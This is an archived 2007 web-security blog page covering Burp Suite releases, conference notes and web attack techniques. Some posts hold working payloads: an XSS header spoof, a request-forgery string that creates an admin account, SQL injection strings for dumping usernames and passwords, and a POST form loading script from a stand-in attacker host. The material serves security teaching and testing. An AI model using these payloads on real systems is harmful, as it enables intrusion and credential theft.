Sunday, December 9, 2007

Burp Suite v1.1 released

I'm pleased to announce that the release version of Burp Suite v1.1 is now available. You can download the software and read about what is new here.

Thanks to everyone who downloaded the beta version and gave me their feedback - this was much appreciated. Burp should hopefully work properly in many kinds of usage scenarios and platforms that I'm unable to test myself.

Monday, November 26, 2007

The new burp beta

The beta version of the new release of Burp Suite is now available.
This is a major release, containing several new tools and features. Highlights include:
  • Improved analysis and rendering of HTTP requests and responses wherever they appear.
  • Burp Sequencer, a new tool for analysing session token randomness.
  • Burp Decoder, a new tool for performing manual and intelligent decoding and encoding of application data.
  • Burp Comparer, a new utility for performing a visual diff of any two data items.
  • Support for custom client certificates (in all tools) and custom server certificates in Burp Proxy.
  • Ability to follow 3xx redirects in Burp Intruder and Repeater attacks.
  • Improved interception and match-and-replace rules in Burp Proxy.
  • A fix for the Intruder payload positions bug affecting some Linux users.
  • A "lean mode", for users who prefer less functionality and a smaller resource footprint.
I'm aiming to complete the final release fairly shortly, so if you have any problems or bugs, please let me know as soon as possible, either via email or in the comments. The new release requires Java version 1.5 or later, so make sure you have the latest JRE installed.

Tuesday, November 6, 2007

Hacker's Handbook - online materials

A few people have emailed me asking where is the online material promised in The Web Application Hacker's Handbook. Apologies for the slight delay on that front. I have now posted almost everything to the location below, including answers to questions, source code, and the checklist of methodology tasks. The only thing not yet ready is the hacker's challenge, of which more in due course. The book's page on the Wiley web site will be updated shortly to point here:

Monday, October 22, 2007

Et Voilà!

It's long, it's turgid, and it'll keep you awake at night. You know what I'm talking about ...

Sunday, October 21, 2007

Introducing Burp Sequencer

This is a preview of a new addition to the Burp family of tools, which will be included in the next release of Burp Suite arriving later this year.

Burp Sequencer is a tool for evaluating the randomness of session tokens or other data. Think Stompy on steroids, with more tests, quantitative results, graphical reporting, and arbitrary sample sizes.

Burp Sequencer is easy to use. The first step is usually to locate a request within the target application which returns a session token somewhere in the response. You can do this using the "send to sequencer" option within any of the other Burp tools:

[click on any image to enlarge]

The request and response are displayed within Sequencer, allowing you to identify the location of the token you are interested in. Any cookies or form fields within the response are automatically parsed out for you to choose; alternatively, you can select an arbitrary position within the response where the token appears:

Once configured, Burp Sequencer begins acquiring tokens from the application by repeatedly issuing your request and extracting the relevant token from the application's responses:

As soon as 100 tokens have been captured, you can perform an analysis of the tokens, to get an initial rough indication of the quality of their randomness. Obviously, a larger sample size enables a more reliable analysis. The live capture continues until 20,000 tokens have been captured, which is sufficient to perform FIPS-compliant statistical tests.

If you have previously obtained a sample of tokens from the application (or from any other source) you can also load these manually into Burp Sequencer, to perform the same analysis on them:

Burp Sequencer can operate on any sample size between 100 and 20,000. The analysis mainly uses significance-based statistical tests in which the assumption that the tokens are random is tested by computing the probability of the observed results arising if this assumption is true. If the probability falls below a particular level (the "significance level") then the assumption is rejected and the anomalous data is judged to be non-random.

This approach allows Burp Sequencer to give an intuitive overall verdict regarding the quality of randomness of the sample. This summary shows the number of bits of effective entropy within the token for each level of significance:

To gain a deeper understanding of the properties of the sample, to identify the causes of any anomalies, and to assess the possibilities for token prediction, Burp Sequencer lets you drill down into the detail of each character- and bit-level test performed. The following screenshot shows the analysis of character distribution at each position within the token:

The following screenshot shows the results of the FIPS monobit test at each bit position within the token:

There are several other useful functions and configuration options affecting how tokens are captured and processed. Hopefully, Burp Sequencer will prove to be a valuable weapon in the web application hacker's arsenal, and will enable more effective and easier assessment of session token randomness than is possible with other current tools.

Saturday, September 15, 2007

Intruder bugfix - nonstandard charsets

Just to placate the salivating hordes who accost me on a daily basis demanding to know when the next release of burp will be available, here is some more evidence that I'm not bluffing and work is actually well underway on the new release.

One annoying bug in Intruder is that the payload positioning marker doesn't work when the JRE is set to use some unusual character sets. Instead of the § character, the payload marker appears as a red box or some other character altogether, which doesn't get recognised when you try to launch an attack. This affected Japanese, some Linux users and other subversives whose character set wasn't set to en-US:

Well, the good news is that this has been fixed in the next release. I'd be most grateful if anyone who experienced this problem could try it out and let me know whether it works for you. If this bug didn't affect you, don't bother with the download as it contains nothing else that differs from the current release version.

Wednesday, September 12, 2007

Hacker's Handbook - table of contents

[drum roll ...]

A mere six months after the first chapter was submitted, The Web Application Hacker's Handbook is now at the final stages of production, which is fortunate given that it will be in the shops in little over a month. I look forward to evenings not spent poring over galley pages looking for the next typesetting error.

Anyway, we now have a final table of contents for you to look at. It gives a fair idea of the subject matter covered - and how much of it there is!

Tuesday, September 11, 2007

Burp Suite feature requests - thank you

Thanks to everyone who responded to my request for suggestions. I've had over 100 messages in various forms, so there are plenty of ideas of what else to include. Here are just a few of the requests I will be aiming to incorporate (in addition to those I mentioned previously):

  • token analyser;

  • option for Intruder/Repeater to follow 3xx redirects;

  • back/forward buttons in Proxy history;

  • fixing the bug with the payload marker when some unusual character sets are used;

  • doing automated find/replace in the message body as well as headers.

Probably the most optimistic request was: "Can you write hooks into all common networking and SSL libraries to make a process use a proxy even if it is not configured to natively?" I already did this for WinINet. But sorry, Ollie, I doubt I'll have the energy to do all the others!

As well as all the good ideas for new features, I received many requests for things that are already there, including:

  • response interception;

  • function to search each request/response;

  • tree view of site being browsed;

  • saving of preferences;

  • NTLM authentication;

  • support for upstream proxy.

Plenty of people emailed me "Great tool, I use it every day, can you make it do X?", when X has been there since day one. May I respectfully suggest that anyone who is missing the above features should take a quick look at the help (or even just the options panels) to find what they are looking for!

Wednesday, August 15, 2007

Browser bugs vs. attacks on same origin policy

A bar-room conversation with a colleague at Black Hat led me to think about this question, and here are my thoughts, for what they're worth.

Today's browsers are full of Oday, particularly in the processing of images and other media, and in plug-ins like ActiveX controls. At the same time, a thriving area of current research is focused on attacks against the browser same origin policy, involving JSON hijacking, DNS rebinding, other workarounds and logic flaws. Which of these areas is more worthy of our attention?

Here are two polarised (and somewhat caricatured) opinions:

  • If I want to compromise a web user, I can just find a browser Oday and completely own them. Attacks against same origin policy are lame and unnecessary.
  • I agree we can't ignore browser bugs if we’re trying to protect web apps. We need to find defences in the application that can stand up to a compromised browser.
Of these two positions, the second is the easiest to shoot down. Aside from a narrow subset of browser bugs, no defences in the application can protect against a compromised browser. If an attacker can execute arbitrary machine-level code within a user's browser, then they completely own that user's interaction with any web application.
Does that mean we must accept the first position? There are several reasons why not:
  • Many would-be attackers are not capable of discovering and exploiting a browser Oday, but can understand and deliver attacks against the same origin policy. Defences that frustrate only some attackers are still worthwhile.
  • Attacks against the same origin policy make interesting research. Most security researchers are interested in class breaks and new genres of attacks, rather than individual bugs. The types of vulnerabilities that exist within browsers, and the ways they can be discovered, are more interesting than the latest bug in an image parser. Similarly, generic ways of circumventing the same origin policy are more interesting than the latest means of inducing network timeouts, to port scan other domains.
  • This area of web security is a weakest link problem, in that an attacker needs to find either a browser bug or a same origin policy bypass to compromise a user. Conventional defence-in-depth does not apply - a robust same origin policy can still be defeated through a bug in the browser, and vice versa. This means that protecting users entails resolving both problem areas. Browser vendors are taking security seriously, and bugs are going to get progressively harder to find and exploit. Meanwhile, research into attacking and defending same origin restrictions needs to continue, so that this is not left as the weak link when browsers become more resilient.

Thursday, August 9, 2007

Black Hat retrospective

My mind and body are now partly recovered from the madness that is Vegas, and I've pieced together as many recollections as I'm able to.

First off, the webappsec training went really well, with some great feedback from the ~70 participants, and the customary job offer made to the CTF winner. It's pretty hard work standing up and talking for four days, but I met some great people and got lots of good ideas to make the course even better next time.

Once the training and jet lag were out of the way, the partying ratcheted up a few notches, and we saw plenty of the nocturnal delights that Vegas has to offer. As well as Caesars, we spent a fair bit of time at Luxor, Venetian and other hotels.

shadow bar

The WASC/OWASP party in the Shadow Bar was great, with much of the webappsec world in attendance, and an opportunity to meet people face to face whom I'd previously only corresponded with.

The Microsoft party took over the top floor of Pure, and drew a wider crowd, with seemingly half of the con getting an invitation, or maybe I was just seeing double by that point.

I also staggered into the iDefense party, and even blagged a VIP wristband, as did several others to the bemusement of some senior iDefense folks who wanted to talk about our contributions to the vulnerability programme. The Hard Rock cafe is a cool venue, although I don't think the crew of assembled geeks did it full justice.

Unsurprisingly, with all of the opportunities for imbibation, our attendance at the actual conference was patchy during the mornings. I was sorry to miss a few good talks, but I have the slides and was able to catch up with many interesting people during the evenings.

RSnake and PortSwigger

I made it to Billy Hoffman's Ajax talk, which was entertaining as usual but didn't contain anything new for me.

I also caught Joanna's update on virtualisation-based rootkits, and her attempts to avoid detection. Like most of areas security, this is an asymmetric problem - while she is sticking her fingers in as many dykes as she can, people only need to find one hole that can't be plugged. In terms of detection of some kind of unexpected virtualisation at least, it appears that timing attacks in particular aren't going to go away any time soon.

Defcon provided some early excitement with this year's badge. J-Lo and I spent the first few minutes struggling through our hangovers figuring out how to reprogram them to make rude words appear.

defcon badge

The Defcon talks were a bit more offbeat, and I caught ones on malicious toasters, video games and various rants. In general, I thought the more mainstream technical talks were a bit disappointing - fairly introductory with little in terms of new ideas. There is definitely room for some easy talks for people who are unfamiliar with a particular area, but it would be good to know in advance what is "for dummies" and what is more innovative.

All in all, it was a fantastic week, but it's good to be home. Vegas messes you up, physically and mentally. I'm nearly back to normal now. It will be great to go back next year.

Tuesday, July 24, 2007

Black Hat pre-spective

With less than a week to go, Vegas is beckoning and it's time to stock up on sun screen and pain killers.

My first four days will be mainly taken up presenting the Web Application (In)security course. In a last-minute addition to the line-up, I'll be joined by minor celebrity Wade Alcorn, the king of BeEF and author of various cool techniques for inter-protocol communication and exploitation. It's going to be well-attended - more than 60 delegates have registered so far.

After four days standing up, it's likely that Tuesday won't be the smallest night of the year. Hopefully it won't run all the way into Wednesday, as I'd like to make David Byrne's talk on anti-DNS pinning, followed by Jer and RSnake updating us on intranet hacking via the browser. In the afternoon, I'll try to make the Premature Ajaxulation talk, for the name if nothing else. It clashes with Lindsay's kernel Odays, but I've had a preview of those already.

I'll certainly be near the front of the queue for the WASC/OWASP cocktail party, and then all of the other ones after that.

On Thursday morning, it would be nice to catch John's latest on rootkits, but I might settle for a beer-assisted precis later on. Billy Hoffman's take on web worms should be good, given his past form. Later on, I'll try to make Alex Sotirov's talk on heap feng shui, which I'm afraid was a hangover casualty in Amsterdam.

With so much going on, there will be a major requirement for frequent relaxation, and I'll look forward to catching up with plenty of people for beers, both at BH and Defcon afterwards.

Monday, July 23, 2007

Hacking without credentials

It is common to be faced with a web application where you have no credentials to log in. Very often, the application contains a wealth of functionality that can be accessed without authentication and which you can start working on to find a way in. Typically, the most promising initial targets are the more peripheral functions supporting the authentication logic, like user registration, password change and account recovery.

But occasionally you will face a narrower challenge. Suppose the web root of the server returns a simple login form, with no other functions and no links anywhere else. You can try to guess a username and password, but is that all?

Here are just a few of the things to think about in this restricted situation:

  • Looking for names, email addresses and other information in the HTML source.

  • Fingerprinting the web server software, application platform and any other identifiable technologies in use, and researching these for vulnerabilities.

  • Enumerating the content that is currently hidden, by brute forcing file and directory names, running Nikto, etc., and checking whether the content discovered is properly access controlled.

  • Checking search engines and Internet archives for references to the target.

  • Tampering with any hidden parameters and cookies in the login request that may affect server-side logic.

  • Checking for any disabled form elements that may still be processed if you re-enable them.

  • Adding common debug parameters (like test=true) to your request.

  • Inspecting the ASP.NET ViewState (if present).

  • Testing for username enumeration via informative failed login messages or other differences.

  • Testing susceptibility to brute force attacks.

  • If the application issues session tokens prior to login, testing these for predictability.

  • Testing all request parameters and headers for common code-level flaws like SQL injection, XSS, script inclusion, etc.

  • Probing for logic flaws within the login function, by omitting parameters, interfering with the request sequence if multi-stage, etc.

  • If the application is hosted in a shared environment, looking for co-hosted applications that you may be able to leverage to attack your target.

Any one of these attacks might give you a sufficient foot in the door to get past the login and into the protected functionality behind it. If they do not, then the login mechanism is a lot more robust than most are, and it is probably time to try to get hold of credentials, or move on to another target.

Friday, July 13, 2007

All your header are belong to us

First there came XMLHttpRequest, and then came Flash. This week, Alex released some great research demonstrating a new technique for spoofing browser HTTP headers.

The original problem with Flash was that it could be used to spoof any HTTP header within the browser of a user who invoked the Flash object. The fix that was applied to Flash did not make the problem go away altogether. It prevented Flash being used to spoof certain built-in browser headers, such as Referer and User-Agent. However, if a vulnerable page echoes the contents of all the headers that it received (as often happens in diagnostic error messages), then Flash is still a viable delivery mechanism for a reflected XSS attack.

What Alex has noticed is that many programming languages use underscores instead of hyphens when naming a header whose value they wish to access. For example, in PHP the following will retrieve the value of the User-Agent header:


Predictably enough, a Flash object can be used to spoof a header containing the non-standard name:

req.addRequestHeader("User_Agent", "<script>alert('xss')</script>");

This is not blocked by the fix to the original problem, and yet in many languages (most notably PHP, Perl, Ruby and ColdFusion) the application will process the attacker's payload instead of the browser's built-in header. Very nice.

Alex also discusses some other attacks, which are well worth a read.

There is an important lesson in all of this, beyond the detail of the actual attack. The subject of request header spoofing arises in all kinds of situations, including XSS, XSRF and DNS pinning. Some people do not realise there is a problem at all, and many others think it has gone away through fixes to Flash and other client-side technologies. Even if the new hole is ultimately plugged, I'd bet that another one will be found soon enough. But regardless of that, we should in general make the working assumption that a malicious web site can spoof any request header of a user who accesses that site. If your application contains XSS when echoing request headers, then fix the bug. If your application trusts request headers when defending against other attacks, then find a more robust defence, before someone else finds a way to bypass it.

Tuesday, July 10, 2007

DNS pinning and web proxies

DNS-based attacks against browsers have been known about for years. These attacks have received increased attention recently, following the discovery of defects within browser-based DNS pinning defences.

So far, discussion has focused on browser issues. However, the same attacks can also be performed against web proxies. Browser-based DNS pinning does not apply when a web proxy is being used, because the DNS look-ups occur on the proxy, not the browser. Hence, even if DNS-based attacks are completely addressed within browsers, the problem is not going to go away altogether.

The most significant opportunities for DNS-based attacks are against web users on internal corporate networks, as a means of gaining unauthorised access to sensitive information and web applications on internal intranets. Given that a large proportion of these users access the Internet via a proxy server, attacks against web proxies may represent at least as significant a threat as those against browsers.

I've written a short paper which explains the problem, examines possible software-based solutions, and describes the defences that organisations and individuals can use to prevent attacks against them. In summary:
  • DNS-based attacks affect web proxies as well as browsers.

  • Today's proxies are vulnerable.

  • The problem is not straightforward to fix in software.

  • You can protect your own infrastructure against these attacks.

Wednesday, July 4, 2007

Book review: Cross Site Scripting Attacks

I just read XSS Attacks by Jeremiah Grossman, Robert Hansen, Anton Rager, Petko Petkov and Seth Fogie. The book is a comprehensive analysis of XSS and related vulnerabilities, and covers everything from a beginner's introduction to XSS through to advanced exploitation and the latest attack techniques.

Overall, the book is well-organised, technically accurate, and full of pertinent examples and code extracts to illustrate the different vulnerabilities and attacks being described. There are plenty of tricks that will benefit even experienced web app hackers, including a wealth of filter bypasses, and coverage of offbeat topics such as injection into style sheets and use of non-standard content encoding.

There is strong coverage of recent research including JavaScript-based port scanning, history stealing and JSON hijacking, as you would expect given that these techniques were largely poineered by some of the authors. All of their explanations are clear and precise, and contain sufficient detail for you to fully understand each issue, and put together working code to exploit it. The book also includes the use of non-standard vehicles such as Flash and PDF for delivery of XSS attacks.

Here and there, the book displays the effects of multiple authorship, notably in the discussion of the best tools for finding XSS flaws. I know that some of the authors have rather opposing views on that question, but it is always good to get different people's perspectives on the tools they find most useful. There are also a few typos and editorial glitches, but that is the price you pay for being quick to market, as they evidently are.

Overall, this is a great book that will benefit a wide range of people, from novices to seasoned hackers. It is fun to read, with plenty of lighter moments punctuating the technical meat. Nothing else currently available is hitting this target - get it while it's hot!

Monday, July 2, 2007

Lame bugs for a rainy day

Most web applications contain enough serious security defects to produce an impressive pen test report, demonstrate a job well done, and (implicitly) justify your fee. In this situation, it is easy to overlook, or fail to report, a wide range of less exciting vulnerabilities that do not provide a direct means of compromising the application.

Just occasionally, you encounter an application which is so nailed down that you can find little bad to say about it. I think I even remember one app that didn't have any XSS, but I may be wrong. Even here, there are usually a bunch of "lame" issues you can identify, to at least demonstrate your attention to detail. Some common examples include:

  • names and email addresses appearing in HTML comments;

  • overly liberal cookie scope;

  • autocomplete enabled;

  • failure to timeout user sessions;

  • broken logout functions;

  • informative error messages;

  • sensitive information transmitted in the query string;

  • session fixation;

  • directory listings;

  • caching of sensitive data;

  • arbitrary redirection.

Why do we think these bugs are lame? Presumably, because you cannot normally exploit them to do anything seriously malicious against your target. But this thought overlooks the possibility of chaining multiple low-risk flaws together. Very often, vulnerabilities that present no threat in isolation can, in skilled hands, be leveraged to completely compromise an application. RSnake's entertaining Death By A Thousand Cuts provides a classic example of this. If we are doing our jobs properly, we should be reporting all of these issues any time they arise, regardless of whether it is raining.

Friday, June 22, 2007

Burp Suite - feature requests please

Now that the manuscript for The Web Application Hacker's Handbook is out of the way, I'll have some proper time to think about the next release of Burp Suite. This will be a major upgrade with lots of new features in all of the tools, including:

  • Improved rendering and analysis of HTTP messages wherever they appear [preview].

  • Function to do a compare/diff between any set of requests and responses.

  • Versatile decoder/encoder with intelligence to detect encoding types and do recursive decoding.

  • Support for client SSL certificates.

  • New payload generators in Intruder.

At this point, it would be good to hear any other feature requests that people have, however large or small. Please leave them in the comments and I'll address as many as I can.

Sunday, June 17, 2007

Web application security training - Black Hat USA

After our success in Amsterdam, Marcus and myself are taking the show on the road and will be presenting the Web Application (In)security course at Vegas in July. The course covers practical techniques for attacking web applications, from the most basic hacks through to advanced exploitation methods. It is a roughly equal mix of presentations and hands-on lab sessions. Some highlights include:

  • exploiting SQL injection using second-order attacks, filter bypasses, query chaining and fully blind exploitation;

  • breaking authentication and access control mechanisms;

  • reverse engineering ActiveX and Java applets to bypass client-side controls;

  • exploiting cross-site scripting to log keystrokes, port scan the victim’s computer and network, and execute custom payloads;

  • exploiting LDAP and command injection; and

  • uncovering common logic flaws found in web applications.

We have a pretty large crowd already, but there is still time to register. If you are there but not on the course, let me know and we can catch up for a beer.

Wednesday, June 13, 2007

ViewState snooping

I've been taking a look at the ASP.NET ViewState recently, and have done a (rather unscientific) survey of the way it is currently used on Internet-facing web applications. Here are a few statistics, based on a sample of more than 10,000 applications:

  • version 1.1 - 54%

  • version 2.0 - 46%

  • MAC-enabled (v1.1) - 93%

  • MAC-enabled (v2.0) - 89%

  • encrypted - 4%

  • average size - 16.8Kb

The largest ViewState I discovered was a whopping 3.8Mb in size, which appeared in a government web application displaying tables of statistics. Given that the ViewState is posted back to the server with each request, this application is seriously sluggish to use, even with a relatively fast connection.

I was surprised at the number of applications not using the EnableViewStateMac option, given that this is now set by default in ASP.NET. Without this option, the contents of the ViewState can be modified by the user, potentially affecting the application's processing in nefarious ways.

Even with EnableViewStateMac set, users can still decode and read the contents of the ViewState if it has not been encrypted. Application developers may use the ViewState to store arbitrary data, beyond the default serialisation of UI controls. I wonder how many attackers bother to decode and inspect the ViewState to check whether it contains anything of interest. The next version of Burp Suite will include a utility to deserialise and render the ViewState contents, to make this task trivial. A sneak preview is shown below:

Tuesday, May 22, 2007

Barriers to automation 1 - vulnerability scanners

When you are attacking a web application, automation is your friend. Not only if you are lazy, but also because automation can make your attacks faster, more reliable and more effective. This is the first in a series of posts exploring ways of using automation in web application testing, and the limitations that exist on its effective use.

Web application vulnerability scanners seek to automate many of the tasks involved in attacking an application, from initial mapping through to probing for common vulnerabilities. I've used several of the available products, and they do a decent job of carrying out these tasks. But even the best current scanners do not detect all or even a majority of the vulnerabilities in a typical application.

Scanners are effective at detecting vulnerabilities which have a standard signature. The scanner works by sending a crafted request designed to trigger that signature if the vulnerability is present. It then reviews the response to determine whether it contains the signature; if so, the scanner reports the vulnerability.

Plenty of important bugs can be detected in this way with a degree of reliability, for example:

  • In some SQL injection flaws, sending a standard attack string will result in a database error message.

  • In some reflected XSS vulnerabilities, a submitted string containing HTML mark-up will be copied unmodified into the application's response.

  • In some command injection vulnerabilities, sending crafted input will result in a time delay before the application responds.

However, not every vulnerability in the above categories will be detected using standard signature-based checks. Further, there are many categories of vulnerability which cannot be probed for in this manner, and which today's scanners are not able to detect in an automated way. These limitations arise from various inherent barriers to automation that affect computers in general:

  • Computers only process syntax. Scanners are effective at recognizing syntactic items like HTTP status codes and standard error messages. However, they do not have any semantic understanding of the content they process, nor are they able to make any normative judgments about it. For example, a function to update a shopping cart may involve submitting various parameters. A scanner is not able to understand that one of these parameters represents a quantity and that another parameter represents a price. Nor, therefore, is it able to assess that being able to modify the quantity is insignificant while being able to modify the price indicates a security flaw.

  • Computers do not improvise. Many web applications implement rudimentary defences against common attacks, which can be circumvented by an attacker. For example, an anti-XSS filter may strip the expression <script> from user input; however, the filter can be bypassed by using the expression <scr<script>ipt>. A human attacker will quickly understand what validation is being performed and (presumably) identify the bypass. However, a scanner which simply submits standard attack strings and monitors responses for signatures will miss the vulnerability.

  • Computers are not intuitive. When a human being is attacking a web application, they often have a sense that something doesn't "feel right" in a particular function, leading them to probe carefully how it handles all kinds of unexpected input, including modifying several parameters at once, removing individual parameters, accessing the function's steps out of sequence, etc. Many significant bugs can only be detected through these kind of actions, however for an automated scanner to detect them it would need to perform these checks against every function of the application, and every sequence of requests. Taking this approach would increase exponentially the number of requests which the scanner needs to issue, making it practically infeasible.

The barriers to automation described above will only really be addressed through the incorporation of full artificial intelligence capabilities into vulnerability scanners. In the meantime, these barriers entail that many important categories of vulnerability cannot be reliably detected by today's automated scanners, for example:

  • Logic flaws, for instance where an attacker can bypass one step of a multi-stage login process by proceeding directly to the next step and manually setting the necessary request parameters. Even if a scanner performs the requests necessary to do this, it cannot interpret the non-standard navigation path as a security flaw, because it does not understand the significance of the content returned at each stage.

  • Broken access controls, in which an attacker can access other users' data by modifying the value of an identifier in a request parameter. Because a scanner does not understand the role played by the parameter, or the meaning of the different content which is received when this is modified, it cannot diagnose the vulnerability.

  • Information leakage, in which poorly designed functionality discloses listings of session tokens or other sensitive items. A scanner cannot distinguish between these listings and any other normal content.

  • Design weaknesses in specific functions, such as weak password quality rules, or easily guessable forgotten password challenges.

Further, even amongst the types of vulnerability that scanners are able to detect, such as SQL injection and XSS, there are many instances of these flaws which scanners do not identify, because they can only be exploited by modifying several parameters at once, or by using crafted input to beat defective input validation, or by exploiting several different pieces of observed behaviour which together make the application vulnerable to attack.

Current scanners implement manual workarounds to help them identify some of the vulnerabilities that are inherently problematic for them. For example, some scanners can be configured with multiple sets of credentials for accounts with different types of access. They will attempt to access all of the discovered functionality within each user context, to identify what segregation of access is actually implemented. However, this still requires an intelligent user to review the results, and determine whether the actual segregation of access is in line with the application's requirements for access control.

Automated scanners are often useful as a means of discovering some of an application's vulnerabilities quickly, and of obtaining an overview of its content and functionality. However, no serious security tester should be willing to rely solely upon the results of a scanner. Many of the defects which scanners are inherently unable to detect can be classified as "low hanging fruit" - that is, capable of being discovered and exploited by a human attacker with modest skills. Receiving a clean bill of health from today's scanners provides no assurance that an application does not contain many important vulnerabilities in this category.

Thursday, May 3, 2007

On-site request forgery

Request forgery is a familiar attack payload for exploiting stored XSS vulnerabilities. In the MySpace worm, Samy placed a script within his profile which caused any user viewing the profile to perform various unwitting actions, including adding Samy as a friend and copying his script into their own profile. In many XSS scenarios, when you simply wish to perform a particular action with different privileges, on-site request forgery is easier and more reliable than attempting to hijack a victim’s session.

What is less well appreciated is that stored on-site request forgery bugs can exist when XSS is not possible. Consider a message board application which lets users submit items that are viewed by other users. Messages are submitted using a request like the following:

POST /submit.php
Content-Length: 34


which results in the following being added to the messages page:

  <td><img src="/images/question.gif"></td>

In this situation, you would of course test for XSS. However, it turns out that the application is properly HTML-encoding any " < and > characters which it inserts into the page. Having satisfied yourself that this defence cannot be bypassed in any way, you might move on to the next test.

But look again. We control part of the target of the <img> tag. Although we can’t break out of the quoted string, we can modify the URL to cause any user who views our message to make an arbitrary on-site GET request. For example, submitting the following value in the type parameter will cause anyone viewing our message to make a request which attempts to add a new administrative user:

../admin/newUser.php?username=daf2&password=0wned &role=admin#

When an ordinary user is induced to issue our crafted request, it will of course fail. But when an administrator views our message, our backdoor account gets created. We have performed a successful on-site request forgery attack even though XSS is not possible. And of course, the attack will succeed even if administrators take the precaution of disabling JavaScript.

(In the above attack string, note the # character which effectively terminates the URL before the .gif suffix. We could just as easily use & to incorporate the suffix as a further request parameter.)

Sunday, April 22, 2007

Preventing username enumeration

Most people know how to do username enumeration, but not everyone knows how to prevent it. Indeed it is often asserted, incorrectly, that eliminating username enumeration altogether cannot be achieved.

The first step in preventing username enumeration in an application is to identify all of the relevant attack surface. This includes not only the main login but also all of the more peripheral authentication functionality such as account registration, password change and account recovery. It is very common to encounter applications in which username enumeration is not possible in the main login function, but can be trivially performed elsewhere.

The second step is to ensure, in every piece of relevant functionality, that the application does not provide a means for an attacker to confirm the validity or otherwise of an arbitrarily chosen username. This is not just a matter of fixing obvious failure messages such as "username incorrect" vs. "password incorrect", but also of checking every aspect of the application's behaviour. For example, if the same literal on-screen failure message is generated by different code paths, then subtle differences may arise within the HTML source. Alternatively, the application may manifest timing differences when processing valid and invalid usernames, because different database queries and computational operations are performed when a valid username is supplied.

Of the various points of attack surface, account registration functionality can seem to be the most difficult area in which to eliminate username enumeration, If an existing username is chosen, surely the application must reject the registration attempt in some manner, enabling an attacker to infer which usernames have been registered? Using CAPTCHA controls and other hurdles may slow down the process, but they do not prevent it.

In fact, there are two ways in which an account registration function can be implemented which avoid introducing enumeration vulnerabilities:
  • The application can specify its own usernames. When an account applicant has supplied their required details and initial password, the application generates a unique username for them. Of course, to avoid a different type of vulnerability, the usernames generated should not be predictable.

  • The application can use email addresses as usernames. The first step of the registration process requires the applicant to supply their email address, to which a message is then sent. If the username is not yet registered, the message contains a one-time URL which can be used to complete the registration process. If the username is already registered, the message informs the user of this, and perhaps directs them towards the account recovery function. In either case, an attacker can only verify a username's status if they control the relevant email account.

Wednesday, April 11, 2007

Out-of-band input channels

When we think about attacking web applications, it is natural to focus on the core means by which we can interact with a target application - that is, using HTTP requests generated by a web browser or other client software. In many applications, however, there are other channels through which we can introduce our input into the application’s processing. These out-of-band channels represent a significant, and often buggy, area of attack surface.

Here are some examples in applications which I have encountered:

  • Web mail applications, in which data received via SMTP is processed by the application and ultimately rendered in-browser to other users.

  • A web interface to a network monitoring solution, in which data sniffed off the wire in a large number of different protocols is collated by the application and displayed in various forms.

  • Portal applications which use RSS mash-ups to render data retrieved from third parties.

  • A web authoring application which allows users to import external web pages by specifying a URL; the application retrieves these via HTTP and processes the contents.

Another example, which I have not encountered and which probably falls into the category of bar-room apocrypha, concerned an application used to process the photographed images of speeding motorists. Reputedly, the application used OCR to read the car’s registration number, and placed this into a SQL query to update its records. Of course, it was vulnerable to SQL injection, but this could only be exploited by printing your attack string onto a registration plate and then driving quickly past a camera. Furthermore, the bug was completely blind, with minimal opportunities for retrieving the results of an arbitrary query. It was mooted that time delays might provide a solution - for example, by triggering very long conditional delays and monitoring the time taken to receive a ticket. However, with only 12 available points on your license, retrieving one bit of data at a time is unlikely to succeed. In this situation, therefore, perhaps the most effective PoC attack string would be:

'; drop table offenders--

Thursday, April 5, 2007

Using recursive grep for harvesting data

Talking to someone the other day I realised that even many experienced users of burp don’t know what the "recursive grep" payload source is used for.

This payload source is different from all the others, because it generates each attack payload dynamically based upon the application’s response to the previous request. In some situations, this can be extremely useful when extracting data from a vulnerable application.

A typical situation is where you have an SQL injection bug that enables you to retrieve a single item of data at a time. To extract the entire contents of a table, you can use recursion to extract each value in turn on the basis of the previous value. For example, suppose you are attacking an MS-SQL database and have enumerated the structure of the table containing user credentials. Supplying the following input returns an informative error message containing the username which appears alphabetically first in this table:

' or 1 in (select min(username) from users where username > 'a')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'abigail' to a column of data type int.

This gives you the username 'abigail', which you can place into your next input to retrieve the username which appears alphabetically second:

' or 1 in (select min(username) from users where username > 'abigail')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'adam' to a column of data type int.

To extract all usernames, you can continue this process, inserting each discovered username into the next request until no more values are returned. However, performing this attack manually may be very laborious. You could write a script to do it in a few minutes. Or in a few seconds, you can configure the "recursive grep" function to perform the attack for you.

The first step is to capture the vulnerable request in burp proxy, and choose the "send to intruder" action. Then type your attack string into the vulnerable field, and position the payload markers around the part which you need to modify:

Next, in order to use "recursive grep" as a payload source, you need to configure "extract grep" to capture the username which is disclosed in each response. To do this, you tell intruder to capture the text following the error message

Syntax error converting the nvarchar value '

and to stop capturing when it reaches a single quotation mark:

Finally, you need to select the "recursive grep" payload source, select the single "extract grep" item you have configured, and specify the first payload as 'a':

That's it! Launching the attack will cause intruder to send 'a' in the first request, and in each subsequent request send the username which was extracted from the previous error message. Within seconds, you can dump out all of the usernames in the table:

You can select save/results table to export the username list. Equipped with this list, you can then use it as a conventional payload source to retrieve all of the passwords and other data, for example using requests of the form:

' or 1 in (select password from users where username = 'abigail')--

There are other cases where recursive grep can be useful, but this kind of attack was the one I mainly had in mind when I wrote it.

Thursday, March 29, 2007

Exploiting XSS in POST requests

One good question I was asked in Amsterdam was whether it is possible to exploit a reflected cross-site scripting bug that can only be triggered via a POST request. The answer, of course, is "yes".

There are plenty of delivery mechanisms for reflected XSS attacks, only some of which involve inducing a victim to click on a crafted URL. For example, an attacker can create an innocuous looking web page containing an HTML form with the required fields, and a script which auto-submits the form:

<form name=TheForm action=http://vuln-app/page.jsp method=post>
<input type=hidden name=foo value=&quot;&gt;&lt;script&#32;src=http://attacker/ bad.js&gt;&lt;/script&gt;>

Rather than creating his own web site, the attacker could of course inject the above attack into a third-party application via a stored XSS bug. The form is submitted cross-domain (as in a cross-site request forgery attack), but the resulting payload executes within the security context of the vulnerable application, enabling the full range of standard XSS attack actions to be performed.

Monday, March 19, 2007

Black Hat Europe

